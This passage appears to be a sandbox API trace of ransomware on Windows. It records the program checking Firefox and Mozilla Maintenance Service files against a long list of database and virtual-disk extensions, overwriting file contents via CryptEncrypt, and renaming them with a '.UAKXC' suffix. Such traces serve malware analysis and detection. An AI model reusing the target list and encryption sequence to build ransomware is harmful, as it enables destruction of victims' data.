(lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".fmp12") returned 0x0 [0139.981] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".fmpsl") returned 0x0 [0139.981] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".fol") returned 0x0 [0139.982] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".fp3") returned 0x0 [0139.982] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".fp4") returned 0x0 [0139.982] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".fp5") returned 0x0 [0139.982] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".fp7") returned 0x0 [0139.982] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".fpt") returned 0x0 [0139.982] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".frm") returned 0x0 [0139.982] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".gdb") returned 0x0 [0139.982] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".grdb") returned 0x0 [0139.982] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".gwi") returned 0x0 [0139.982] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".hdb") returned 0x0 [0139.982] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".his") returned 0x0 [0139.982] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".ib") returned 0x0 [0139.982] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".idb") returned 0x0 [0139.982] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".ihx") returned 0x0 [0139.982] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".itdb") returned 0x0 [0139.982] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".itw") returned 0x0 [0139.982] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".jet") returned 0x0 [0139.982] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".jtx") returned 0x0 [0139.982] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".kdb") returned 0x0 [0139.982] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".kexi") returned 0x0 [0139.983] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".kexic") returned 0x0 [0139.983] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".kexis") returned 0x0 [0139.983] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".lgc") returned 0x0 [0139.983] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".lwx") returned 0x0 [0139.983] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".maf") returned 0x0 [0139.983] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".maq") returned 0x0 [0139.983] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".mar") returned 0x0 [0139.983] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".mas") returned 0x0 [0139.983] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".mav") returned 0x0 [0139.983] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".mdb") returned 0x0 [0139.983] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".mdf") returned 0x0 [0139.983] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".mpd") returned 0x0 [0139.983] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".mrg") returned 0x0 [0139.983] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".mud") returned 0x0 [0139.983] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".mwb") returned 0x0 [0139.983] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".myd") returned 0x0 [0139.984] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".ndf") returned 0x0 [0139.984] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".nnt") returned 0x0 [0139.984] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".nrmlib") returned 0x0 [0139.984] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".ns2") returned 0x0 [0139.984] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".ns3") returned 0x0 [0139.984] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".ns4") returned 0x0 [0139.984] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".nsf") returned 0x0 [0139.984] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".nv") returned 0x0 [0139.984] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".nv2") returned 0x0 [0139.984] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".nwdb") returned 0x0 [0139.984] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".nyf") returned 0x0 [0139.984] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".odb") returned 0x0 [0139.984] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".oqy") returned 0x0 [0139.984] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".orx") returned 0x0 [0139.984] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".owc") returned 0x0 [0139.984] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".p96") returned 0x0 [0139.984] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".p97") returned 0x0 [0139.984] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".pan") returned 0x0 [0139.984] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".pdb") returned 0x0 [0139.984] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".pdm") returned 0x0 [0139.985] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".pnz") returned 0x0 [0139.985] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".qry") returned 0x0 [0139.985] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".qvd") returned 0x0 [0139.985] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".rbf") returned 0x0 [0139.985] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".rctd") returned 0x0 [0139.985] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".rod") returned 0x0 [0139.985] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".rodx") returned 0x0 [0139.985] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".rpd") returned 0x0 [0139.985] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".rsd") returned 0x0 [0139.985] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".sas7bdat") returned 0x0 [0139.985] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".sbf") returned 0x0 [0139.985] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".scx") returned 0x0 [0139.985] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".sdb") returned 0x0 [0139.985] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".sdc") returned 0x0 [0139.985] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".sdf") returned 0x0 [0139.985] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".sis") returned 0x0 [0139.985] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".spq") returned 0x0 [0139.985] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".sql") returned 0x0 [0139.985] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".sqlite") returned 0x0 [0139.985] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".sqlite3") returned 0x0 [0139.986] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".sqlitedb") returned 0x0 [0139.986] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".te") returned 0x0 [0139.986] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".temx") returned 0x0 [0139.986] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".tmd") returned 0x0 [0139.986] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".tps") returned 0x0 [0139.986] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".trc") returned 0x0 [0139.986] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".trm") returned 0x0 [0139.986] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".udb") returned 0x0 [0139.986] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".udl") returned 0x0 [0139.986] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".usr") returned 0x0 [0139.986] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".v12") returned 0x0 [0139.986] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".vis") returned 0x0 [0139.986] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".vpd") returned 0x0 [0139.986] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".vvv") returned 0x0 [0139.986] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".wdb") returned 0x0 [0139.986] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".wmdb") returned 0x0 [0139.986] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".wrk") returned 0x0 [0139.986] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".xdb") returned 0x0 [0139.986] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".xld") returned 0x0 [0139.987] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".xmlff") returned 0x0 [0139.987] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".abcddb") returned 0x0 [0139.987] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".abs") returned 0x0 [0139.987] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".abx") returned 0x0 [0139.987] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".accdw") returned 0x0 [0139.987] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".adn") returned 0x0 [0139.987] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".db2") returned 0x0 [0139.987] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".fm5") returned 0x0 [0139.987] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".hjt") returned 0x0 [0139.987] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".icg") returned 0x0 [0139.987] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".icr") returned 0x0 [0139.987] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".kdb") returned 0x0 [0139.987] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".lut") returned 0x0 [0139.987] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".maw") returned 0x0 [0139.987] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".mdn") returned 0x0 [0139.987] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".mdt") returned 0x0 [0139.988] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".vdi") returned 0x0 [0139.988] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".vhd") returned 0x0 [0139.988] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".vmdk") returned 0x0 [0139.988] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".pvm") returned 0x0 [0139.988] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".vmem") returned 0x0 [0139.988] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".vmsn") returned 0x0 [0139.988] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".vmsd") returned 0x0 [0139.988] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".nvram") returned 0x0 [0139.988] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".vmx") returned 0x0 [0139.988] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".raw") returned 0x0 [0139.988] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".qcow2") returned 0x0 [0139.988] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".subvol") returned 0x0 [0139.988] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".bin") returned 0x0 [0139.988] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".vsv") returned 0x0 [0139.988] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".avhd") returned 0x0 [0139.988] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".vmrs") returned 0x0 [0139.989] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".vhdx") returned 0x0 [0139.989] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".avdx") returned 0x0 [0139.989] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".vmcx") returned 0x0 [0139.989] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpSrch=".iso") returned 0x0 [0139.989] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.989] WriteFile (in: hFile=0x6c8, lpBuffer=0x3abfd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x3abfc78, lpOverlapped=0x0 | out: lpBuffer=0x3abfd70*, lpNumberOfBytesWritten=0x3abfc78*=0x20c, lpOverlapped=0x0) returned 1 [0139.991] WriteFile (in: hFile=0x6c8, lpBuffer=0x3abfc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x3abfc7c, lpOverlapped=0x0 | out: lpBuffer=0x3abfc80*, lpNumberOfBytesWritten=0x3abfc7c*=0xa, lpOverlapped=0x0) returned 1 [0139.991] SetEndOfFile (hFile=0x6c8) returned 1 [0139.992] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.992] ReadFile (in: hFile=0x6c8, lpBuffer=0x5030000, nNumberOfBytesToRead=0x8f3b, lpNumberOfBytesRead=0x3abfc88, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesRead=0x3abfc88*=0x8f3b, lpOverlapped=0x0) returned 1 [0139.993] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0xffff70c5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.993] WriteFile (in: hFile=0x6c8, lpBuffer=0x5030000*, nNumberOfBytesToWrite=0x8f3b, lpNumberOfBytesWritten=0x3abfc44, lpOverlapped=0x0 | out: lpBuffer=0x5030000*, lpNumberOfBytesWritten=0x3abfc44*=0x8f3b, lpOverlapped=0x0) returned 1 [0139.994] CloseHandle (hObject=0x6c8) returned 1 [0140.064] GetProcessHeap () returned 0xea0000 [0140.064] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xef06f0 [0140.064] lstrcpyW (in: lpString1=0xef06f0, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files") returned="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files" [0140.064] lstrcatW (in: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files", lpString2=".UAKXC" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files.UAKXC") returned="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files.UAKXC" [0140.064] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files" (normalized: "c:\\program files (x86)\\mozilla firefox\\removed-files"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files.UAKXC" (normalized: "c:\\program files (x86)\\mozilla firefox\\removed-files.uakxc")) returned 1 [0140.220] GetProcessHeap () returned 0xea0000 [0140.220] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef06f0 | out: hHeap=0xea0000) returned 1 [0140.220] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeeab8 | out: hHeap=0xea0000) returned 1 [0140.221] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed058 | out: hHeap=0xea0000) returned 1 [0140.221] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x20, pbBuffer=0x3abfd50 | out: pbBuffer=0x3abfd50) returned 1 [0140.221] CryptGenRandom (in: hProv=0xed0cd0, dwLen=0x8, pbBuffer=0x3abfd48 | out: pbBuffer=0x3abfd48) returned 1 [0140.221] CryptEncrypt (in: hKey=0xecf860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x28, dwBufLen=0x20c | out: pbData=0x3abfd70*, pdwDataLen=0x3abfc8c*=0x200) returned 1 [0140.222] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\updater.ini")) returned 0x20 [0140.222] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\updater.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c8 [0140.222] GetLastError () returned 0x0 [0140.222] GetFileSizeEx (in: hFile=0x6c8, lpFileSize=0x3abfc88 | out: lpFileSize=0x3abfc88*=1245) returned 1 [0140.222] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".4dd") returned 0x0 [0140.222] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".4dl") returned 0x0 [0140.222] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".accdb") returned 0x0 [0140.222] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".accdc") returned 0x0 [0140.223] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".accde") returned 0x0 [0140.223] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".accdr") returned 0x0 [0140.223] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".accdt") returned 0x0 [0140.223] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".accft") returned 0x0 [0140.223] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".adb") returned 0x0 [0140.223] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".ade") returned 0x0 [0140.223] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".adf") returned 0x0 [0140.223] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".adp") returned 0x0 [0140.223] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".arc") returned 0x0 [0140.223] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".ora") returned 0x0 [0140.223] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".alf") returned 0x0 [0140.223] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".ask") returned 0x0 [0140.223] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".btr") returned 0x0 [0140.223] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".bdf") returned 0x0 [0140.223] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".cat") returned 0x0 [0140.223] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".cdb") returned 0x0 [0140.223] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".ckp") returned 0x0 [0140.223] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".cma") returned 0x0 [0140.223] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".cpd") returned 0x0 [0140.224] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".dacpac") returned 0x0 [0140.224] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".dad") returned 0x0 [0140.224] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".dadiagrams") returned 0x0 [0140.224] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".daschema") returned 0x0 [0140.224] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".db") returned 0x0 [0140.224] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".db-shm") returned 0x0 [0140.224] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".db-wal") returned 0x0 [0140.224] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".db3") returned 0x0 [0140.224] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".dbc") returned 0x0 [0140.224] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".dbf") returned 0x0 [0140.224] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".dbs") returned 0x0 [0140.224] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".dbt") returned 0x0 [0140.224] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".dbv") returned 0x0 [0140.224] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".dbx") returned 0x0 [0140.224] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".dcb") returned 0x0 [0140.224] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".dct") returned 0x0 [0140.224] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".dcx") returned 0x0 [0140.224] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".ddl") returned 0x0 [0140.224] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".dlis") returned 0x0 [0140.225] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".dp1") returned 0x0 [0140.225] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".dqy") returned 0x0 [0140.225] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".dsk") returned 0x0 [0140.225] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".dsn") returned 0x0 [0140.225] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".dtsx") returned 0x0 [0140.225] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".dxl") returned 0x0 [0140.225] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".eco") returned 0x0 [0140.225] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".ecx") returned 0x0 [0140.225] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".edb") returned 0x0 [0140.225] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini", lpSrch=".epim") returned 0x0 